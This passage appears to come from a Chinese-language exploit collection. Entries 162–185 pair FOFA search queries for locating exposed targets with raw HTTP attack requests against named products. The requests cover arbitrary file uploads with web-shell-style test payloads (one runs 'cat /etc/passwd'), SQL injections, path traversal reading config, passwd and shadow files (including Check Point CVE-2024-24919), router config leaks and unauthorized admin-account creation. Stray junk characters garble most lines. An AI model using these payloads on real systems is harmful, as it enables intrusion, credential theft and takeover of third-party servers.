- H7 ]1 g! [ O6 U( J2 I$ c<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>. f, B- @1 n" J, v" g( l
<tag>3</tag>( }7 B9 G: U; e/ l! n" q# J
</UploadResume>
6 K; u1 Y6 t3 c% `: u. W</soap:Body>
8 \ b0 X4 z% t! m. ~ M1 h" Q</soap:Envelope>& r8 p6 R; g) u# ~( O
4 G1 G. ]$ f1 i# I" n
9 S7 i5 ? V& vhttp://x.x.x.x/dizxdell.aspx9 y* S. o2 _$ a7 P/ p5 P# r
% h' X6 o7 M Q1 ^162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
% P' U2 ^0 b6 N% d8 J q9 X7 wFOFA: app="和丰山海-数字标牌"1 z# f7 [. a1 E! P4 v. B" R8 v; w
POST /QH.aspx HTTP/1.18 t& j- y/ [1 q& g1 i7 r9 [* Z, T
Host: x.x.x.x& b$ M0 [) [1 J6 Z' o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0, ~5 e- ~+ \7 B. b
Connection: close: H1 s' Z2 D [+ O* N5 g
Content-Length: 583% F0 |) f) c; t' [
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
6 `8 B" ]8 j1 \% g( I- ]7 d% jAccept-Encoding: gzip
. C% E+ C b4 B7 |2 g( v5 j, \2 M' i( p
------WebKitFormBoundaryeegvclmyurlotuey
/ ^# t0 F. w7 B0 }3 \# i( sContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
8 u* m9 @) r2 E6 `0 lContent-Type: application/octet-stream) A3 L1 _) i1 j5 B, x$ m/ W
+ B1 Z5 |9 B7 G4 b0 x<% response.write("ujidwqfuuqjalgkvrpqy") %>! i' N7 L* ?7 X$ p r
------WebKitFormBoundaryeegvclmyurlotuey% [) o% e) G% K P) W. ~, F
Content-Disposition: form-data; name="action"! s: R6 g! _/ o" B
1 E _( w5 w% }) Qupload
7 I( {+ c6 q' L------WebKitFormBoundaryeegvclmyurlotuey
# K/ R; |! Z8 a) Q% {Content-Disposition: form-data; name="responderId"
" h( z6 h# [$ g, W+ L2 e" W( s; E- Z; x/ ]1 r% x
ResourceNewResponder
0 }& g. C! s( l4 w------WebKitFormBoundaryeegvclmyurlotuey4 `; G' c# p- T1 j+ U" `
Content-Disposition: form-data; name="remotePath"
. p4 _2 k: h" a5 q4 y/ ^& h2 W0 u
# v# h. j- I+ w/opt/resources. N K7 ` A( V2 w' B# d z
------WebKitFormBoundaryeegvclmyurlotuey--. N: s" ?! q# z
$ o" Q" [8 w9 H7 t% b
: X# Y$ e# {7 ^, i) F; nhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
8 s# z; r4 J' Z2 D; }8 m
9 F3 T: l& {9 C4 \. f163. 号卡极团分销管理系统 ue_serve.php 任意文件上传% J. p$ O3 Q7 R( k7 p( F
FOFA: icon_hash="-795291075"* s% t" f& o- Y5 u" }
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
& N0 d ~8 i9 W- t) Y( SHost: x.x.x.x9 n. J [4 v; {9 c3 k7 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36) {1 Q8 s. n' D! Q, l9 ~
Connection: close; ~2 ?2 j" u6 b; i6 R/ A- C
Content-Length: 293, U. G, G' a. Z V1 H8 h
Accept: */*3 t. n/ |3 P+ T
Accept-Encoding: gzip, deflate& m" D8 @/ g, H9 m9 m, R! l
Accept-Language: zh-CN,zh;q=0.9- m3 r: B( d" E& b- k) t. R
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod* [& c% M$ s: f2 Y4 F- q# b
( d6 t% @+ l, e3 X6 N$ n9 U------iiqvnofupvhdyrcoqyuujyetjvqgocod
( X) J9 z1 p; I( @ C$ P x' ~Content-Disposition: form-data; name="name". R4 B; O7 S% ]3 P4 T& B: D& h
# L7 s4 N' v6 R- Y2 {4 x0 V
1.php
" c0 Z& w- B% H7 d------iiqvnofupvhdyrcoqyuujyetjvqgocod
' i4 [/ q; p( c" S8 ~+ V$ z2 w" TContent-Disposition: form-data; name="upfile"; filename="1.php": B0 v& i9 x( ]- d" z
Content-Type: image/jpeg
5 E. ^) Z5 f# W) q7 K7 H2 @
: p) g5 l# | C: O' ~: L; e' ~rvjhvbhwwuooyiioxega" N9 v& K) J( T& d
------iiqvnofupvhdyrcoqyuujyetjvqgocod--$ D+ U0 v8 Y, A6 i ^
* q; H8 j: C6 W2 W6 f* I( ~
0 j- O7 K! @( E* Y+ o
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
3 s, O, A: e( G. i5 m$ p$ VFOFA: title="智慧综合管理平台登入"* }2 x7 K/ {' b# y8 E- A
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1+ U% b% y$ F2 [2 f. e3 \3 ?5 r
Host: x.x.x.x. {) i, T% f& Y( I+ V' @. T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
% D, ~4 f' X2 F9 c' k3 _Content-Length: 288
0 z" K }" f# G7 w6 G1 c& ]Accept: application/json, text/javascript, */*; q=0.01$ l; c2 e- y9 a! h7 D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, x. ?% h0 g, f7 j5 Q
Connection: close
' s) b5 O! c0 H" ^! h( \5 `8 Q0 KContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
% S2 V0 ?: Q2 \7 xX-Requested-With: XMLHttpRequest
1 L7 Z* q: Y0 R0 EAccept-Encoding: gzip1 O7 ~1 H5 N% |2 A9 y+ k% r
2 p- N W I3 N# @------dqdaieopnozbkapjacdbdthlvtlyl. Z( z7 U; E" X5 _1 T/ \. ~
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"! y/ i' \7 ~% X3 w' [) S
Content-Type: image/jpeg& I4 _) d( v* a+ a$ W# C0 b2 S( `
0 J( r% X" ?7 Y* n6 ~! ~
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
4 h0 {8 @; |9 ^, P' b3 P. y------dqdaieopnozbkapjacdbdthlvtlyl--- W9 c" N _0 R5 R, [
; E2 \: g1 m" o) W
9 K+ y, C: [ T: B! lhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
# T9 M: H$ p4 s' y7 g6 c! M: R7 e: u/ m. c
165. OrangeHRM 3.3.3 SQL 注入
2 g% m' R2 _" K( ? U; R4 i# V/ H: ACVE-2024-364284 h' S; A4 y. T
FOFA: app="OrangeHRM-产品"
3 s5 V- E2 p4 I% Y+ U0 Q# D: fURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))6 w8 P6 d8 ` J- z8 y! B, P
" M S' D' Q% H( s/ V
. p: G, h$ s* o# S K0 }166. 中成科信票务管理平台SeatMapHandler SQL注入2 S% A; v. R6 y7 r. }. N! U
FOFA:body="技术支持:北京中成科信科技发展有限公司"/ _' k$ d' Q/ t: u" D3 B) V
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1( u" v/ \ K) }$ Z
Host:
[, P U6 k. hPragma: no-cache
?: d! F; u( F" m5 O0 N. E. A! jCache-Control: no-cache1 }& p' S% \ H0 @
Upgrade-Insecure-Requests: 1, }, d. K1 [% E' t5 I# j d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
* R6 I# L p6 F) J2 ?- FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 t) `0 Q. i1 Z
Accept-Encoding: gzip, deflate
3 K* q/ ]* \% E' j- j* r+ {Accept-Language: zh-CN,zh;q=0.9,en;q=0.8; f B8 Y! J2 t! k; \% O' U
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
' X1 R5 ?! m8 v3 [Connection: close
0 {" I1 |" I. n$ k0 PContent-Type: application/x-www-form-urlencoded+ [0 \( r4 |9 h6 ?, Z
Content-Length: 890 K' h( P; K# U- k; |; G
) a J1 l4 T- Z' [9 E! a% [Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
7 J7 l% a) t( b# H6 t8 D
$ V$ s" [% M" E0 ^* f% F, T
% q9 _( A; g. X$ Y/ s/ E167. 精益价值管理系统 DownLoad.aspx任意文件读取
4 D* u; p" |& PFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"1 a/ E' j5 D4 _: f. E
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1) a( E6 w+ {5 K
Host:3 V* \5 V+ I& q( q3 }$ M" r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) c# Y+ a5 d( j3 n u. R% X
Content-Type: application/x-www-form-urlencoded
0 H# J2 u2 g% n" ^* XAccept-Encoding: gzip, deflate* R/ a) r7 p' y; D
Accept: */*
# O% {* {' W) j. V" iConnection: keep-alive K$ K% a) |6 {! C
. N7 X, q0 J) q
/ d' { L! Q* R9 a5 X- c+ M) t168. 宏景EHR OutputCode 任意文件读取4 U; M+ l0 R5 }6 c; o/ c
FOFA:app="HJSOFT-HCM"
$ ]3 ^' Q) ]. H& o: ^GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1; H1 q1 Z( ?" s d0 R* N
Host: your-ip
% y T8 p/ G$ M" l. Q- yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
" X. |7 p7 w' Q* l7 m8 _3 X" [Content-Type: application/x-www-form-urlencoded! A, w" P& T. D0 N
Connection: close* |0 N7 U& \$ ]9 J
0 ]4 X" _* k2 q7 T d! _
8 V8 f$ {- L4 i- L6 c9 r; f5 `1 e N" _. [, n3 `
169. 宏景EHR downlawbase SQL注入
/ e: m* U% y) d7 F1 [8 S1 W, x% EFOFA:app="HJSOFT-HCM"
& B3 f5 K2 k7 W9 Y7 D K5 u8 |" MGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1; w G" h; E) D" }% v+ U
Host: your-ip
+ J: F1 |& V% H# R6 A: mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; |4 M: f) J a! C( pAccept: */*5 v4 y3 C: I0 O) R. j
Accept-Encoding: gzip, deflate
' ?4 j* Q% F! X; J5 D6 q# C8 g2 o2 iConnection: close
: }4 b# l: l4 E- V3 T1 i! V* q) J
" j/ _7 \8 |9 \
" c1 h1 F/ M4 h8 T
3 t& [( _9 i/ Q3 X170. 宏景EHR DisplayExcelCustomReport 任意文件读取
# i3 N! X4 n( [/ s) YFOFA:body="/general/sys/hjaxmanage.js"
5 [3 x+ M: B5 g, r, g- h8 dPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
& J y' P& `7 L N+ R/ i( K* W9 SHost: balalanengliang
, n% P. a5 v8 Y! K& WUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 Y. U3 ?6 ]/ F% h- zContent-Type: application/x-www-form-urlencoded
( a9 C$ \6 t" |' ?; N# ?% M$ p) ?6 [
filename=../webapps/ROOT/WEB-INF/web.xml/ W6 {' U0 X: `) K
% t: N# v. ?7 q& Y
# l: |1 \# Y- P, l$ @4 g& O171. 通天星CMSV6车载定位监控平台 SQL注入6 V( i4 _' m. C4 q, ]$ ^' c/ D
FOFA:body="/808gps/"
s5 c" q4 I G% j+ W( q/ |% oGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.14 r5 Z* E' }! C$ v
Host: your-ip
6 j3 _% D$ R: g; NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.01 k; Y2 ~; P3 O2 g3 \
Accept: */*
% n0 C% _8 [ k2 m1 \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 L1 Q$ T) V( B4 Y% t3 a, d
Accept-Encoding: gzip, deflate+ D7 e* Q/ p+ r% G' m
Connection: close5 R. f* \, C" e- a! i9 E
! L! [3 q) D1 f/ B; N' E( W q: P- c3 O E; o, I9 B7 u
/ x" D1 l" k3 t172. DT-高清车牌识别摄像机任意文件读取
5 G2 E5 b! `: V* ~. fFOFA:app="DT-高清车牌识别摄像机"7 @; A4 ] d$ b4 K3 G* ^2 r8 s
GET /../../../../etc/passwd HTTP/1.18 ^" F- g+ I* E* r
Host: your-ip2 b" h1 R/ [' Y) v _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 g* F0 b' p! Y# Z2 w2 I
Accept-Encoding: gzip, deflate+ m) L* @, y8 |% P# J k8 Z& |" n( h
Accept: */*
$ y! }: g3 T# N8 V g: aConnection: keep-alive
+ r- L2 b/ N! O6 s4 L% ]9 p _7 K X4 [0 ^9 i. O" Y
3 o. l+ c9 a2 H% V* y& W* o( O! Z3 B9 a- g
173. Check Point 安全网关任意文件读取! J* G/ J s& \" X/ y
CVE-2024-24919
3 W/ i5 h) A: j% r0 C, k; uFOFA:app="Check_Point-SSL-Network-Extender"' t, E. ?; [& a* i6 ^
POST /clients/MyCRL HTTP/1.1
3 c8 ~6 x- ~: U B2 R- Q" PHost: your-ip
7 S& e: c% z* q- h5 MContent-Type: application/x-www-form-urlencoded
9 N9 Z$ p Y! g6 y# I# E- r
! f: O5 b* Z7 Q! R* VaCSHELL/../../../../../../../etc/shadow; h* q* d$ ~3 ?& t1 L3 v
- B1 Y+ K$ Q" ~3 Y8 L' E
: j3 t9 b2 |& J5 O1 B4 L
% z$ v) s1 c. o9 H, o174. 金和OA C6 FileDownLoad.aspx 任意文件读取
7 m& R: v' |: UFOFA:app="金和网络-金和OA"( ?; O4 m/ ?/ w# p- Y
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
" w# W7 o8 A/ h4 j: V+ d C5 L7 c) r SHost: your-ip3 A. _- J& e: @# l0 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36& \' g, q& f7 b( U d. s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- }, O9 A' U( o% W4 h9 a
Accept-Encoding: gzip, deflate, br6 q; I) c: _0 M4 P3 w
Accept-Language: zh-CN,zh;q=0.90 b! x8 b* g# Q @/ x4 `! g
Connection: close3 I; ~3 e& [5 l2 ^7 i$ c
& q' b' S( |& O; J0 |% p. {3 |2 d% g- r, c$ R. C, e
4 p; | \+ b( I* f7 _6 ~: ?5 {. o$ Y175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入* k' G) I9 m: ?
FOFA:app="金和网络-金和OA"
2 f s$ A5 ~" T5 o s8 \5 TGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1- N6 p( w. I- ]4 h
Host:
. z5 G+ \4 f& v$ R* e! s, _User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 v: u! X/ u! Y- y! B& d% I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 B3 z5 H- p( s: D+ p0 ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( x* n7 j+ } p3 c) q# s6 J
Accept-Encoding: gzip, deflate3 o* J& _, J' A" M0 J, s( j
Connection: close
1 c1 X# O9 b' X* D+ ^' {Upgrade-Insecure-Requests: 14 r+ Z- s3 e. g
& R3 c# b6 y( K! \' K1 e- n. E
( W! i/ C- M. V- L4 q$ P+ x6 C2 s176. 电信网关配置管理系统 rewrite.php 文件上传
! \. h6 [( {6 D0 l; zFOFA:body="img/login_bg3.png" && body="系统登录"
) s' d; `! X: }POST /manager/teletext/material/rewrite.php HTTP/1.1
3 b( _! ?* w0 e1 C6 JHost: your-ip
( E# a. F6 g3 w: p0 l; iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
& C* R, U# r/ pContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT+ z8 S# ]) h5 E a- b) `' x" p
Connection: close
, T' `" s2 l: w0 a* M7 K# `2 W6 D7 f& n f
------WebKitFormBoundaryOKldnDPT
_3 Q/ z' D, I2 x, c2 L; W' BContent-Disposition: form-data; name="tmp_name"; filename="test.php"
, P) T. t! }/ j0 O& ?Content-Type: image/png: F+ ^6 k' @3 _4 V4 d% j
& ^3 L3 |" j6 o, a<?php system("cat /etc/passwd");unlink(__FILE__);?>
/ j; W2 F; w$ }; l+ \1 i$ z% y------WebKitFormBoundaryOKldnDPT
, K: j3 f) @2 p" AContent-Disposition: form-data; name="uploadtime"# R/ E' v" w# B1 O
; F* e. h2 C( \+ \
. r3 w( Z. u# D------WebKitFormBoundaryOKldnDPT--( {4 K4 P! \4 a6 A
- {1 y k5 J- u* f7 i% K0 x1 b+ a2 \0 w
, X- K' |6 L3 h5 A4 R+ Q! {
177. H3C路由器敏感信息泄露
3 R7 g: Q. d& n: x1 L6 m7 [; `, o/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg1 c G+ u y8 }+ U% X4 G: s$ o! x
/userLogin.asp/../actionpolicy_status/../M60.cfg/ U6 z ~( v; J' P2 ?6 v. k+ q
/userLogin.asp/../actionpolicy_status/../GR8300.cfg8 m2 Z1 T4 C3 `' m
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
i, i- e( g3 b- I/userLogin.asp/../actionpolicy_status/../GR3200.cfg0 @ n! u3 K+ |( g& P& _+ W
/userLogin.asp/../actionpolicy_status/../GR2200.cfg, W* l; l7 {+ H% n" f/ U- I' s
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
4 }" s5 S5 ~9 O N4 V! \ f/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg' C! e" c2 V1 u( G) L3 ~
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
# k/ c2 M' a9 k: l3 w8 ~/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg4 u7 `' I( N0 B }) w+ t. W
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
8 R. W% k0 R$ c$ z/userLogin.asp/../actionpolicy_status/../ER5100.cfg) S7 r) r4 O* e3 E. U. A
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg, S+ Y+ A( u) W/ n
/userLogin.asp/../actionpolicy_status/../ER3260.cfg; i( [" h. I: t' C m- f- V
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg3 P9 n' j; @5 p3 x
/userLogin.asp/../actionpolicy_status/../ER3200.cfg' | j& j, Q' [/ t$ Q' q
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
+ a! ^" |* O6 J8 e% X2 c/ Y2 L/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
: p3 D7 B- X1 V3 C! P1 k* ?9 p/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg3 I" X% E/ D: Z& |4 B6 u
/userLogin.asp/../actionpolicy_status/../ER3100.cfg1 L1 A- a7 L4 L4 E$ y+ z2 g
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
, @3 Q& r! G3 J. f. Z9 ?$ u9 y+ A* Q4 K: r8 q) e
; {6 m' Q+ J! ^. s
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
& B4 |4 W% s( n7 uFOFA:header="/selfservice"
3 I# |. H% P e+ z$ M" P Z5 PPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
+ C* b, E0 M9 l! DHost:
& L8 a6 h6 l& b1 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
/ ^6 _1 e) z; k7 O* eContent-Length: 252
/ g; W1 s1 |% b7 s- {$ @# R% VAccept-Encoding: gzip, deflate2 d; F Y" @; U
Connection: close
0 Q. z& Y8 A7 u+ D' K. I* f5 @1 A- rContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l2 c/ H: m) p5 M' @' ?, T7 r
-----------------aqutkea7vvanpqy3rh2l
; ?% M( m/ g7 DContent-Disposition: form-data; name="12234.txt"; filename="12234"
; }0 S# Y/ n) \* ?Content-Type: application/octet-stream
+ J# l3 p6 ]- b) Y7 o. c* MContent-Length: 255/ E$ O3 X3 c2 u! {" @
3 _: B5 }1 O3 t0 w" w12234: I/ X; F8 r0 y4 K7 n
-----------------aqutkea7vvanpqy3rh2l--
# q; ~! O7 P& D$ m7 o- J% V! \, u
3 K. @7 n0 D1 g
GET /imc/primepush/%2e%2e/flex/12234.txt0 W9 z2 x7 _+ n" T* a, l* i
4 o* ?& ]# H6 o- U @/ `9 o1 g( U, R
' V* y& p! B$ { t$ Z4 ]2 G
179. 建文工程管理系统存在任意文件读取
* s- [- q) U3 g- GPOST /Common/DownLoad2.aspx HTTP/1.1
5 a$ f8 o) h8 l1 G* ?8 f: y" x0 nHost: {{Hostname}}
: A! J7 P6 z. S: n5 | NContent-Type: application/x-www-form-urlencoded
9 ~' h! P. Y6 HUser-Agent: Mozilla/5.0 \1 }8 X. V5 n2 H8 ~4 x
9 Q0 d* J/ Y( m' u- H( tpath=../log4net.config&Name=: ~% z# N% F6 B9 D- V9 |2 a5 {
4 A2 c6 F' {% Y( [: F$ b3 t, ~8 p; Y4 o
6 F* h( V) j" n2 Q- N7 C180. 帮管客 CRM jiliyu SQL注入
% k4 x8 Z3 x* n5 E' g! h! mFOFA:app="帮管客-CRM"
4 N: O! a5 I5 E9 z# b q* HGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1. C$ A9 E+ a. ?2 R1 L
Host: your-ip' ?, F' l9 L$ I7 {' L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.366 p4 R4 }; w& X* V/ Q( j6 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 _& n+ a% P, w$ L( c( s
Accept-Encoding: gzip, deflate1 i6 l% L) r- M7 X$ y$ `# W" C9 w
Accept-Language: zh-CN,zh;q=0.9
( |* e$ R6 f. b5 vConnection: close
5 M, G9 ?6 u. N9 x! s. T, i- P' G) P- Q$ f8 `' B8 `
; G, Z/ t1 n. X! Q1 N6 S' i181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入( O/ x- V2 C- Y* W
FOFA:"PDCA/js/_publicCom.js"2 O* }2 X* _ f& y& ?( i! W
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
+ C r2 a$ {5 i+ @Host: your-ip
1 G7 z( {( J& S/ t% m% dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
& N. H8 J) t0 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, ?/ D9 o" e O7 \ X* [! `
Accept-Encoding: gzip, deflate, br
! b3 B/ I: w% P4 z$ Z) YAccept-Language: zh-CN,zh;q=0.9- c! \" L, F0 C. Y8 z# G' V( s: t
Connection: close
+ \1 i3 s$ P- CContent-Type: application/x-www-form-urlencoded, s1 k+ P$ p# N5 N' k7 d- i
( [& K9 V# c" r: H' z9 x# W9 \! ?5 c% v6 v+ P. c) `% L
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
2 f n' y4 l6 @
) A6 r$ i2 n7 m% [0 E
3 H0 K9 t% [9 @ w6 [182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建5 L9 T" U' r5 n, y, k
FOFA:"PDCA/js/_publicCom.js"3 c; ]0 Q) Z) p5 V- R
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
1 c2 Q5 }; L+ v8 JHost: your-ip' _5 r+ R# G6 z/ f5 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36% q" ]* k) A [ G* Q& N% D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* U' A1 A! I% T7 \Accept-Encoding: gzip, deflate, br- |3 g* x. |* J L6 v- B
Accept-Language: zh-CN,zh;q=0.93 S' y- C* {4 Z6 c3 S
Connection: close
" a* A4 f1 t6 I5 P+ D+ XContent-Type: application/x-www-form-urlencoded' {8 U, P4 Z4 B5 H% e& v
- c. {; C: x2 g8 g3 g# h
$ }" Z5 S# a4 g. p/ [* n: Pusername=test1234&pwd=test1234&savedays=1
9 w$ O X. g: Q) c* T a; M# P* f7 m
f# y6 ?% }. B" ]2 b- o+ I
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
) e+ {5 U+ Z3 {; ?1 S- DFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
: n7 K' O2 s( @3 r0 X& B8 D! VGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1% C' u1 Q; I( v( ?$ j8 C
Host: your-ip
$ c8 w3 u) i6 @! `, }User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.360 U" B! r# J& _& d7 X- k. \. V- C
Accept-Charset: utf-8
& O& X: ?' z" f9 oAccept-Encoding: gzip, deflate% A1 g' _7 }4 U8 \) _
Connection: close( J1 N, f' M9 P4 p
) [2 }! {0 p# Q4 m9 ~! E1 z
3 G4 o0 Z1 ~5 b7 f184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
" d5 `) T/ {& [& JFOFA:server="SunFull-Webs"
2 h8 G% t8 L# x% B `- kPOST /soap/AddUser HTTP/1.1
/ P' X* T; ]) W( j KHost: your-ip( |% T3 C( B" D r9 v
Accept-Encoding: gzip, deflate8 e5 d4 w! }5 q6 |$ ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0$ K" V" I! o+ `) M+ e0 e) y
Accept: application/xml, text/xml, */*; q=0.01
5 |7 B& a+ }- I& ^2 ^/ H5 |Content-Type: text/xml; charset=utf-8
8 ~ l$ v3 P0 t6 C* u9 v, RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ t1 k- ~: J0 _. H2 O$ f' qX-Requested-With: XMLHttpRequest1 S( O; _9 c# M, r
; p' H7 [. ^+ ^ _( z: c; }' ~+ R$ m7 z
4 G3 f o( G4 rinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')! Z, A |3 l3 X8 w
& k, y$ b0 h: s2 T% P' e5 p( H4 u
' x* ]% x/ m1 z( h/ e; j185. 瑞友天翼应用虚拟化系统SQL注入
/ b/ O: Q' j) Yversion < 7.0.5.1" ?: x5 q4 f9 t5 P* P9 L- Y0 ]4 g
FOFA:app="REALOR-天翼应用虚拟化系统"6 X+ P6 a! B3 f9 i8 \
